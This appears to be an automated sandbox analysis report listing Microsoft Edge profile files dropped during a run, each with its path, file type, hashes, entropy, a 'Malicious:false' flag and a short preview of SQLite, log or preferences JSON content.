                                                                                                                                                                                                                                                                          SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                          SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                          SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\b90b071d-4835-4d58-bac7-b1b747f203c2.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):80
                                                                                                                                                                                                                                                                          Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                          MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                          SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                          SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                          SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):422
                                                                                                                                                                                                                                                                          Entropy (8bit):5.217858584310386
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvJa+q2PCHhJ23oH+TcwtzjqEKj0QMxIFUtJv28HZZmwPvIhd3VkwOCHhJ23oq:7FvBYebvqBZFUtLZ/ox56YebvqBaJ
                                                                                                                                                                                                                                                                          MD5:8DF9A1C9F444442D20FB159B2084FA1E
                                                                                                                                                                                                                                                                          SHA1:9973075FEECE23B5795461C551ECBE4A1025CB8E
                                                                                                                                                                                                                                                                          SHA-256:D2F54E43F54C6356D81B2BC7F1CAD860159229A68EB8F6C5AA8F50E0ACA87FBD
                                                                                                                                                                                                                                                                          SHA-512:0A61902EB465C8BBF44BBB9F5122BC6D641C4C8843C859A9B9D57C8D1060DF59F21E5E102ADE3E2CFC0749B7E849B0FA0D70C6140C87EB33F8DFA1D5B9366525
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:55.959 1a08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/09-08:55:55.961 1a08 Recovering log #3.2025/01/09-08:55:55.966 1a08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):422
                                                                                                                                                                                                                                                                          Entropy (8bit):5.217858584310386
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvJa+q2PCHhJ23oH+TcwtzjqEKj0QMxIFUtJv28HZZmwPvIhd3VkwOCHhJ23oq:7FvBYebvqBZFUtLZ/ox56YebvqBaJ
                                                                                                                                                                                                                                                                          MD5:8DF9A1C9F444442D20FB159B2084FA1E
                                                                                                                                                                                                                                                                          SHA1:9973075FEECE23B5795461C551ECBE4A1025CB8E
                                                                                                                                                                                                                                                                          SHA-256:D2F54E43F54C6356D81B2BC7F1CAD860159229A68EB8F6C5AA8F50E0ACA87FBD
                                                                                                                                                                                                                                                                          SHA-512:0A61902EB465C8BBF44BBB9F5122BC6D641C4C8843C859A9B9D57C8D1060DF59F21E5E102ADE3E2CFC0749B7E849B0FA0D70C6140C87EB33F8DFA1D5B9366525
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:55.959 1a08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/09-08:55:55.961 1a08 Recovering log #3.2025/01/09-08:55:55.966 1a08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):325
                                                                                                                                                                                                                                                                          Entropy (8bit):5.204077137366633
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvSM+q2PCHhJ23oH+TcwtpIFUtJvFCEJZmwPvFCEcMVkwOCHhJ23oH+Tcwta/o:7z+vBYebmFUtuEJ/AE9V56YebaUJ
                                                                                                                                                                                                                                                                          MD5:4F81B11A0726E9D1AC4F79830C949738
                                                                                                                                                                                                                                                                          SHA1:3FF03127FFF7BF84B8C7D5D95A38D0DD30D74A87
                                                                                                                                                                                                                                                                          SHA-256:E2ABD5BAC22EDCB0174D9166DB15214B597D6EF8ECF59001C64C47487EC3FC27
                                                                                                                                                                                                                                                                          SHA-512:BC2AB029486E6CA153B1DF783FAB6E0CD6F8BEDBE6114B64B3A08BBCC758370BC619EDF767CF537EC715EF52C10E41F9B760F80A8961A2F92E32CC17DA4EE171
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:35.650 eac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/09-08:55:35.661 eac Recovering log #3.2025/01/09-08:55:35.661 eac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):325
                                                                                                                                                                                                                                                                          Entropy (8bit):5.204077137366633
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvSM+q2PCHhJ23oH+TcwtpIFUtJvFCEJZmwPvFCEcMVkwOCHhJ23oH+Tcwta/o:7z+vBYebmFUtuEJ/AE9V56YebaUJ
                                                                                                                                                                                                                                                                          MD5:4F81B11A0726E9D1AC4F79830C949738
                                                                                                                                                                                                                                                                          SHA1:3FF03127FFF7BF84B8C7D5D95A38D0DD30D74A87
                                                                                                                                                                                                                                                                          SHA-256:E2ABD5BAC22EDCB0174D9166DB15214B597D6EF8ECF59001C64C47487EC3FC27
                                                                                                                                                                                                                                                                          SHA-512:BC2AB029486E6CA153B1DF783FAB6E0CD6F8BEDBE6114B64B3A08BBCC758370BC619EDF767CF537EC715EF52C10E41F9B760F80A8961A2F92E32CC17DA4EE171
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:35.650 eac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/09-08:55:35.661 eac Recovering log #3.2025/01/09-08:55:35.661 eac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                          Entropy (8bit):1.2650751425014164
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:KrJ/2qOB1nxCkMdSAELyKOMq+8QTQKC+CVumW:K0q+n0Jd9ELyKOMq+8Q7B
                                                                                                                                                                                                                                                                          MD5:4F6EBA892B9C1A8647991A6492FEDB3E
                                                                                                                                                                                                                                                                          SHA1:B12DD9A3045503C65F5795C409CFF76B3CEC8BE2
                                                                                                                                                                                                                                                                          SHA-256:3433C3EAF24A1B010684B707ADB5ABA38957BA421D5F991ECEC32C1E77FF1E65
                                                                                                                                                                                                                                                                          SHA-512:86DCC6F1EF1A9BD06F2C9C94A848956D4E70CF2A31B43DB43A818A01B42BA2D8BF82EDBC172FA5F7A4987E93F362F190052995C66A03CFC67D6730865BA3CF94
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                          Entropy (8bit):0.46693415448219827
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0LrQ4c:v7doKsKuKZKlZNmu46yjx0LU4c
                                                                                                                                                                                                                                                                          MD5:A959B4D40E3A3BC458F5F63B751F3013
                                                                                                                                                                                                                                                                          SHA1:935EBC1A3786C41964E022C65A2D10F6E3BF0C46
                                                                                                                                                                                                                                                                          SHA-256:FF5F00EE89E2215A0AE6990109D459C5FEEDB852FCB907673A10EC78334FED48
                                                                                                                                                                                                                                                                          SHA-512:48BC3AF2C6AFC738E0F8670DA0F3227CF224C34D4C64EDBDB9F98801B92575E48A18A0EFC0225C0252EDFF4608D675E4978BA5A17B5722EE9EDA907E0C3D3B16
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a838cbd2-1b91-469e-a147-3b9d9e05b9a0.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):13612
                                                                                                                                                                                                                                                                          Entropy (8bit):5.239382828551976
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:stbJ99QTryDigabatSuypXskrXIa34HkgYYUQ1i8CbV+FCwQwd4Cbq7NIaPfYJ:stbPGKSu4XskrXXrbGJQwmCm7NIj
                                                                                                                                                                                                                                                                          MD5:F73F00C757A5C884BC03C2E263C3F174
                                                                                                                                                                                                                                                                          SHA1:BD943C6EB9312EA3A3D32E098F73E61A639FD349
                                                                                                                                                                                                                                                                          SHA-256:F6FFF2EB599E8A043A7DE7799BFABE05B72A4BDD25A028B534430EE012C6FB34
                                                                                                                                                                                                                                                                          SHA-512:D4D643C7AAC62BB31C8903F405982A66695A100A4CE248729A5955484521EF370ADE2A009FD3FBCD0FC1DD17F8411812D62F58662E9CD0C1E03D3C81D2846140
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904536315242","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):11755
                                                                                                                                                                                                                                                                          Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                          MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                          SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                          SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                          SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b08d57f3-f0e4-40ff-a508-2ac00e2278eb.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40504
                                                                                                                                                                                                                                                                          Entropy (8bit):5.56129862483325
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:0Znyku7pLGLhOkWPxhfbF8F1+UoAYDCx9Tuqh0VfUC9xbog/OV88apJv+rwc9oQq:0ZnykuchOkWPxhfbFu1jaJ8aLvbUoQwz
                                                                                                                                                                                                                                                                          MD5:F4B5BA538F619CB0F921CAC647F54D98
                                                                                                                                                                                                                                                                          SHA1:15C3F547123AB58F13F67324832606105AB70334
                                                                                                                                                                                                                                                                          SHA-256:A8274EC3B21EE962030A67F21BDA5A0A053607F08FDCD15C5B75D98223AA4B73
                                                                                                                                                                                                                                                                          SHA-512:FEB80E741BD4D7A9032A1556ACBBCE763AFD3FFEFA542670DBF786386C540D660783E6F757FED33D11713CAC60B820FEBFACCD6EA2E964135E7717F89AC3B28C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380904535643113","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380904535643113","location":5,"ma

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d088a214-db9c-4855-943f-5df0f5d32866.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):37149
                                                                                                                                                                                                                                                                          Entropy (8bit):5.564363640164279
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:0ZnyHkWPxhfkF8F1+UoAYDCx9Tuqh0VfUC9xbog/OV88apJv+rwc9oWR6ZmqKpQw:0ZnyHkWPxhfkFu1jaJ8aLvbUoWR65Rt6
                                                                                                                                                                                                                                                                          MD5:4AFAA8BA13143DA296EC368EFACC7946
                                                                                                                                                                                                                                                                          SHA1:D7D83AA46EF28CEDEB6D1AE4B39BE1C7E6606ADE
                                                                                                                                                                                                                                                                          SHA-256:211AA666C0922D78462908651D04F9E18B45357FCC060B1C11EC38E72184E923
                                                                                                                                                                                                                                                                          SHA-512:A06B17E49E15FA7B4E015FF39BC6E1415467D7D57A8DB404415C0BFE1707BE14F534C3CBA6DD9BEB8D2E72E34562278816672C22F434EF2ECCAC2A6E9A2EE031
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380904535643113","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380904535643113","location":5,"ma

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                          Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                          MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                          SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                          SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                          SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\fc62e92b-1465-4f38-b266-83dbfd4f5bf3.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (17582), with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):17592
                                                                                                                                                                                                                                                                          Entropy (8bit):5.494593586299019
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:stbPGKSu4XskrXXYk+qULDmJkT1bGJQwmp7f7NIj:sJOxuQ7FmbGaZQ
                                                                                                                                                                                                                                                                          MD5:A250BD24AA9D8652C7D0EFF74EAF4376
                                                                                                                                                                                                                                                                          SHA1:FD850E89313EE49A04CE22DBFD4315AE8566345B
                                                                                                                                                                                                                                                                          SHA-256:881397AD6AE53C8F519D16B457FBB2FB3CF1E7C9081AF8F7C3311EE3B4A8C0E1
                                                                                                                                                                                                                                                                          SHA-512:026227C0E5C3B7ACA076E26CD1BE9FBE7A77EE0380EC2C9650BE41447F9F9B5CB289D95B3B8CA3359792272D2655731A908A62C72695F16D4C04A2DC1D070CF9
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904536315242","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                          Entropy (8bit):0.10213855977213164
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:+1ppgic1ppgiJDspEjVl/PnnnnnnnnnnnvoQ/Eou:+6YoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                          MD5:B21D8959BB86527AC56E121087DD9DFA
                                                                                                                                                                                                                                                                          SHA1:9F54767619A27DDF7CE092D7F7C76E296B9C3CBE
                                                                                                                                                                                                                                                                          SHA-256:43D1D318376FCB2423A41F9628D10B965DFD97F9244C5A5A033948686996215C
                                                                                                                                                                                                                                                                          SHA-512:E19752D51B081A18ED94438455E108E65C529BF84A36F9768B88F51D2D99771219AD001ADE737C5538403E5D00E43A5F5CF0DD2D993B23CBA02B78A95979DB1A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:..-.............M.........v......XE6.:...%L@...\..-.............M.........v......XE6.:...%L@...\........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                          Download File
